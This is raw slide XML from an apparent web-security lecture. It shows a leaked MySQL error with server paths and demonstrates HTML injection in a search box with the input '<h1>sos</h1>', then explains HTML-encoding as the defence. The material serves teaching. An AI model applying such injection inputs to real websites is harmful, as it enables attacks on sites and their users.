              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>recur_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IS NULL AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_recur_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=0) UNION (SELECT egw_cal_repeats.*,egw_cal.*,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_start,cal_end,cal_recur_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JOIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_dates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_dates.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JOIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_user.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LEFT JOIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_repeats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_repeats.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_user_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>='u' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IN (56,-135,-2,-40,-160)) AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> != 'R' AND 1225062000 &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt; 1228082400 AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_recur_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204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itchFamily="16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dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Error: 1 (Can't create/write to file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/#sql_322_0.MYI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'  ....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itchFamily="16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dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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vol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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egw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/web-docs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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egroupware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/calendar/inc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>class.socal.inc.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill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itchFamily="16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dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" pitchFamily="16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600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Session halted.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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C3D2D61-AFCE-4818-86EE-7AE84966FA79}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>16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665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GB" sz="1800" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>of old course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>schedule website</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939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br>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/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F76264-0822-4CC2-9C21-7FBB80E62E68}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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8600"/>
            <a:ext cx="5486400" cy="6400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00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63924A7-4E84-DEB4-FDB6-603867147F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Client-side injection problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="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AD1313D-3BB8-B45A-FA9E-36DA5C8111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042BD9-1AEB-FAC1-2924-2653C94F2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3B8174-AE38-0E3A-97D0-1BFBAEB08B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441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i="1" dirty="0"/>
              <a:t>Search engine example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3686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/>
          </a:p>
          <a:p>
            <a:pPr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/>
          </a:p>
        </p:txBody>
      </p:sp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85295BBB-9136-4B2F-93EB-8A52071EC258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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18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061394" y="1052736"/>
            <a:ext cx="5041900" cy="3962047"/>
            <a:chOff x="2035175" y="1867253"/>
            <a:chExt cx="5041900" cy="3962047"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36869" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2035175" y="2049463"/>
              <a:ext cx="5041900" cy="3779837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6870" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2035175" y="1867253"/>
              <a:ext cx="5041900" cy="180975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3333CC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6871" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2411413" y="2528888"/>
              <a:ext cx="1981200" cy="371513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 err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sos</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>     </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36872" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4751388" y="2528888"/>
              <a:ext cx="1800225" cy="53975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Search</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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2799226" y="4040188"/>
              <a:ext cx="3445536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Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a: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No matches found for </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800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sos</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="18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03648" y="5529324"/>
            <a:ext cx="6442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 Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Try this yourself at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://xss-doc.appspot.com/demo/2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0099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6634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EF96C-1275-8C66-EC95-730E2597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Application-Bound (App-Bound) Encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>[not exam material]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4967A-0805-F131-5EE5-E0859C9D2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524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In July 2024 Chrome introduced App-bound encryption to protect cookies, not from attacks via the browser, but from attacks by malware on the victim’s computer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200" dirty="0"/>
              <a:t>https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html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4EEE1-3309-A09C-8E48-AA6DFEA5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EB752-97F1-B301-ABB9-64E52466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7" name="Picture 6" descr="A diagram of a service&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{229BA8F7-5E67-4ED2-33C0-85E6AC1BB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839" y="1765327"/>
            <a:ext cx="6084168" cy="393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255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i="1" dirty="0"/>
              <a:t>Search engine example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/>
          </a:p>
          <a:p>
            <a:pPr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/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05E4B9C-F2DD-4BB6-8F39-F118B091CC89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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Groep 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2061394" y="1055262"/>
            <a:ext cx="5041900" cy="3960812"/>
            <a:chOff x="2051050" y="1808163"/>
            <a:chExt cx="5041900" cy="3960812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37893" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2051050" y="1989138"/>
              <a:ext cx="5041900" cy="3779837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7894" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2051050" y="1808163"/>
              <a:ext cx="5041900" cy="180975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3333CC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2411412" y="2528888"/>
              <a:ext cx="2006227" cy="371513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Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sos</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>     </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37896" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4742631" y="2478030"/>
              <a:ext cx="1800225" cy="53975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Search</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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2663003" y="4040188"/>
              <a:ext cx="3717983" cy="126406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No matches found for </a:t>
              </a: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endParaRPr lang="en-GB" sz="1800" b="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40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GB" sz="4000" b="1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sos</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                  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388B8FD-B2E2-BC02-228F-4A5E428F41A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133241" y="5437097"/>
            <a:ext cx="728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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: attacker input is treated as HTML in the browser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6654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755576" y="2943726"/>
            <a:ext cx="748576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        or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Here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dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> written as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>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in the HTML source.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So these special characters have been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML-encoded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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escaped </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to make them harmless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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2167731" y="3274269"/>
            <a:ext cx="5041900" cy="1821287"/>
            <a:chOff x="2051720" y="1862039"/>
            <a:chExt cx="5041900" cy="1927001"/>
          </a:xfrm>
        </p:grpSpPr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2051720" y="2060848"/>
              <a:ext cx="5041900" cy="1728192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2051720" y="1862039"/>
              <a:ext cx="5041900" cy="180975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3333CC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2483768" y="2348880"/>
              <a:ext cx="1981200" cy="371513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Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sos</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
